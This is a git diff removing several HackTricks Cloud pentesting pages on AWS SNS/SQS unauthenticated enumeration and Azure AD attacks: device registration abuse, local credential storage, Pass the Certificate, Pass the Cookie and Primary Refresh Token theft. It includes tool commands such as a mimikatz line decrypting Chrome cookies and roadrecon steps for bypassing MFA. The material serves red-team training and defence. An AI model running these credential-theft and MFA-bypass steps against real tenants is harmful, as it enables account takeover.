-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md deleted file mode 100644 index 416a48e0e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - SNS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
-## SNS
-
-For more information about SNS check:
-
-{% content-ref url="../aws-services/aws-sns-enum.md" %}
-[aws-sns-enum.md](../aws-services/aws-sns-enum.md)
-{% endcontent-ref %}
-
-### Open to All
-
-When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic:
-
-
- -So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md deleted file mode 100644 index 5926225b3..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md +++ /dev/null @@ -1,49 +0,0 @@ -# AWS - SQS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
-## SQS
-
-For more information about SQS check:
-
-{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %}
-[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md)
-{% endcontent-ref %}
-
-### Public URL template
-
-```
-https://sqs.[region].amazonaws.com/[account-id]/{user_provided}
-```
-
-### Check Permissions
-
-It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-device-registration.md b/pentesting-cloud/azure-security/az-device-registration.md deleted file mode 100644 index 44e42482b..000000000 --- a/pentesting-cloud/azure-security/az-device-registration.md +++ /dev/null @@ -1,138 +0,0 @@ -# Az - Device Registration - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -When a device joins AzureAD a new object is created in AzureAD. - -When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt. - -Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible. - -Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).: - -```bash -dsregcmd /status -``` - -After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.** - -For more information about what is a PRT check: - -{% content-ref url="az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md" %} -[az-primary-refresh-token-prt.md](az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) -{% endcontent-ref %} - -### TPM - Trusted Platform Module - -The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\ -But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights. 
- -If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys): - -{% content-ref url="az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} -[pass-the-prt.md](az-lateral-movement-cloud-on-prem/pass-the-prt.md) -{% endcontent-ref %} - -## Registering a device with SSO tokens - -It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it: - -```bash -# Initialize SSO flow -roadrecon auth prt-init -.\ROADtoken.exe - -# Request token with PRT with PRT cookie -roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie - -# Custom pyhton script to register a device (check roadtx) -registerdevice.py -``` - -Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. - -{% hint style="success" %} -Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**. -{% endhint %} - -{% hint style="danger" %} -This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). 
-{% endhint %} - -## Overwriting a device ticket - -It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A). - -
- -{% hint style="danger" %} -However, this was fixed. -{% endhint %} - -## Overwrite WHFB key - -[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) - -Attack summary: - -* It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO -* It **defeats TPM protection** as the key is **sniffed during the generation** of the new key -* This also provides **persistence** - -
- -Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph. - -Then, it's possible to generate a new key with: - -```bash -roadtx genhellokey -d -k tempkey.key -``` - -and then PATCH the information of the searchableDeviceKey: - -
- -It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check: - -{% content-ref url="az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md" %} -[az-phishing-primary-refresh-token-microsoft-entra.md](az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) -{% endcontent-ref %} - -
- -## References - -* [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A) -* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g) -* [https://www.youtube.com/watch?v=AFay\_58QubY](https://www.youtube.com/watch?v=AFay_58QubY) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md deleted file mode 100644 index 5cb58cb86..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md +++ /dev/null @@ -1,91 +0,0 @@ -# Az - Lateral Movement (Cloud - On-Prem) - -## Az - Lateral Movement (Cloud - On-Prem) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### On-Prem machines connected to cloud - -There are different ways a machine can be connected to the cloud: - -#### Azure AD joined - -
- -#### Workplace joined - -

https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large

- -#### Hybrid joined - -

https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large

- -#### Workplace joined on AADJ or Hybrid - -

https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large

- -### Tokens and limitations - -In Azure AD, there are different types of tokens with specific limitations: - -* **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource. -* **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications. -* **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device. -* **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens. - -The most interesting type of token is the Primary Refresh Token (PRT). - -{% content-ref url="az-primary-refresh-token-prt.md" %} -[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md) -{% endcontent-ref %} - -### Pivoting Techniques - -From the **compromised machine to the cloud**: - -* [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login -* [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text. -* [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it -* [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it. 
-* [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another - -From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**: - -* [**Azure AD Connect**](azure-ad-connect-hybrid-identity/) -* **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md) - -#### [Roadtx](https://github.com/dirkjanm/ROADtools) - -This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/) - -## References - -* [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md deleted file mode 100644 index 0b2239549..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md +++ /dev/null @@ -1,65 +0,0 @@ -# Az - Local Cloud Credentials - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Local Token Storage and Security Considerations - -### Azure CLI (Command-Line Interface) - -Tokens and sensitive data are stored locally by Azure CLI, raising security concerns: - -1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`. -2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details. -3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as: - * Executed commands with credentials embedded. - * URLs accessed using tokens, potentially revealing sensitive information. - -### Azure PowerShell - -Azure PowerShell also stores tokens and sensitive data, which can be accessed locally: - -1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext. -2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`. -3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access. - -## Automatic Tools to find them - -* [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) -* [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1) - -## Security Recommendations - -Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by: - -* Limiting access rights to these files. -* Regularly monitoring and auditing these directories for unauthorized access or unexpected changes. -* Employing encryption for sensitive files where possible. -* Educating users about the risks and best practices for handling such sensitive information. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md deleted file mode 100644 index 31e22a7a5..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md +++ /dev/null @@ -1,67 +0,0 @@ -# Az - Pass the Certificate - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Pass the Certificate (Azure) - -In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism. - -In super simplified terms: - -* The machine (client) initiating the connection **needs a certificate from Azure AD for a user**. -* Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD** -* Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**. - -In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack: - -* Username -* Tenant ID -* PRT -* Security context -* Derived Key - -It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:** - -{% code overflow="wrap" %} -```bash -RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE] -``` -{% endcode %} - -The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user. 
- -```bash -Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP -``` - -## References - -* For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md deleted file mode 100644 index cdead6bd4..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md +++ /dev/null @@ -1,59 +0,0 @@ -# Az - Pass the Cookie - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Why Cookies? - -Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate. - -You can see where are **browser cookies located** in: - -{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome" %} - -## Attack - -The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in: - -{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords" %} - -With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command: - -```bash -mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit -``` - -For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately. - -Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated. 
- -## References - -* [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md deleted file mode 100644 index 301eb11d2..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Phishing Primary Refresh Token (Microsoft Entra) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md deleted file mode 100644 index 1520fc868..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Primary Refresh Token (PRT) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
